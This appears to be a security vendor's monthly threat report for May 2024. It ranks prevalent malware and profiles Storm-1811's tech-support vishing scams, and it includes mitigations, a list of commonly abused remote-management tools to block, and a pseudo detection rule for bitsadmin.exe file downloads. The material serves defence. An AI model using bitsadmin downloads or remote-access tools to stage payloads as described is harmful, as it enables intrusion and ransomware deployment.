Highlights from May
After dropping out of the rankings last month, Atomic Stealer is back on our top 10 most prevalent threat list. It returned at its highest rank so far in our top 10, in a three-way tie for 2nd with SocGholish and this month’s top 10 newcomer, Storm-1811, which we share more about below.
XMRig activity increased enough to tie for 6th with Mimikatz, making this XMRig’s second appearance on the list after its December 2023 debut. Yellow Cockatoo also returned to the top 10 after a few months of reduced activity.
We had several familiar faces stay on the list in new positions, including Gootloader, which moved up from 8th to 5th, and Scarlet Goldfinch, which dropped from 3rd to 8th. Raspberry Robin, another list regular, fell out of the top 10 altogether in May.
This month’s Top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for May 2024:
Month's rank | Threat name | Threat description |
---|---|---|
Month's rank: ⬆ 1 | Threat name: | Threat description : Collection of Python classes to construct/manipulate network protocols |
Month's rank: ⬆ 2* | Threat name: Atomic Stealer | Threat description : Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets |
Month's rank: ⬆ 2* | Threat name: | Threat description : Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
Month's rank: ⬆ 2* | Threat name: Storm-1811 | Threat description : Financially motivated threat actor and Black Basta affiliate who uses tech support scams and RMM tools, notably Microsoft Quick Assist, for initial access |
Month's rank: ⬆ 5 | Threat name: | Threat description : JScript dropper/downloader that typically poses as a document containing an "agreement,” often distributed through search engine redirects |
Month's rank: ⬇ 6* | Threat name: | Threat description : Open source tool that dumps credentials using various techniques |
Month's rank: ⬇ 6* | Threat name: XMRig | Threat description : Monero cryptocurrency miner that is often deployed as a secondary payload |
Month's rank: ⬇ 8* | Threat name: | Threat description : Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
Month's rank: ⬆ 8* | Threat name: | Threat description : Malware family capable of a range of behaviors, including DLL side-loading, capturing the screen, and keylogging |
Month's rank: ⬇ 8* | Threat name: | Threat description : Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems |
Month's rank: ⬆ 8* | Threat name: | Threat description : Activity cluster characterized by the delivery of an information stealer and .NET RAT via search engine redirects |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Tracking Storm-1811’s help desk scams
Our newcomer to the list this month is Storm-1811. Beginning in late April 2024 and continuing throughout May, Red Canary saw an activity cluster that we are tracking as Storm-1811. This is Microsoft’s name for a financially motivated threat actor that uses social engineering to gain initial access to environments via remote monitoring and management (RMM) tools—including Microsoft Quick Assist—on victim endpoints.
Storm-1811 leverages different communication methods in ways that increase the effectiveness of their social engineering scams. They use voice phishing (aka vishing) and call users masquerading as tech support, sometimes after reportedly flooding the users’ inboxes with emails. In recent attacks they have also reportedly used Microsoft Teams messages to increase their credibility as IT staff, according to Microsoft. The adversary convinces victims to provide remote access through Microsoft Quick Assist or by downloading and running AnyDesk.
After the adversary gains access, we observed Storm-1811 using curl to download additional tools like OpenSSH, ScreenConnect, and NetSupport Manager. Other reported payloads include Impacket, used for lateral movement, and PsExec, used to deploy Black Basta ransomware
Social engineering attacks are, admittedly, hard to combat. Some mitigation strategies to consider are:
- Training users to verify the identity of IT staff that call them via trusted internal methods, for example confirming identities with video calls or requiring a shared secret like the endpoint in question’s serial number.
- QuickAssist is installed by default on Windows machines. If it is not in use in your environment, disable or uninstall it.
- Inventory the RMMs that are approved for use in your environment. Investigate security alerts for unapproved RMMs and also suspicious activity related to approved RMMs. If possible, block RMMs commonly used in malicious attacks—for example, NetSupport, AnyDesk and ScreenConnect—that aren’t in use in your environment.
Red Canary also saw Storm-1811 use bitsadmin.exe
to download follow-on payloads. This gives us a detection opportunity.
Detection opportunity: Executing the Background Intelligent Transfer Service (bitsadmin.exe
) to download files
This pseudo detection analytic identifies execution of the Background Intelligent Transfer Service (bitsadmin.exe
) with command options to signal file downloads. Adversaries like Storm-1811 use bitsadmin.exe
to download malware as a way of bypassing application whitelisting solutions. Note that bitsadmin.exe
may be used legitimately by some administration software in your environment.
process == (bitsadmin
)
&&
command_line_includes == (download
)
&&
deobfuscated_command_line_includes == (bitsadmin
, download
)
&&
command_line_does_not_include == (*
)
Note: *
is a placeholder for strings associated with legitimate use of bitsadmin
in your environment
In case you missed it: Open your scripts with Notepad
Many malware families use scripts as part of their intrusions. They have been popular with adversaries for years, a trend that shows no sign of slowing down. These lures can come in the form of multiple script types, including JavaScript, and delivered multiple ways.
If a trusting user opens that malicious script, one way to mitigate script execution is to create a Group Policy Object (GPO) to change the default behavior of commonly misused script extensions, making them behave like benign text files that open in Notepad and do not automatically execute. On May 31, Jeff Felling and Red Canary published a blog about recent prevalent threats like SocGholish and Gootloader that use this technique, and shared specific details on how to create these GPOs to help protect your environment.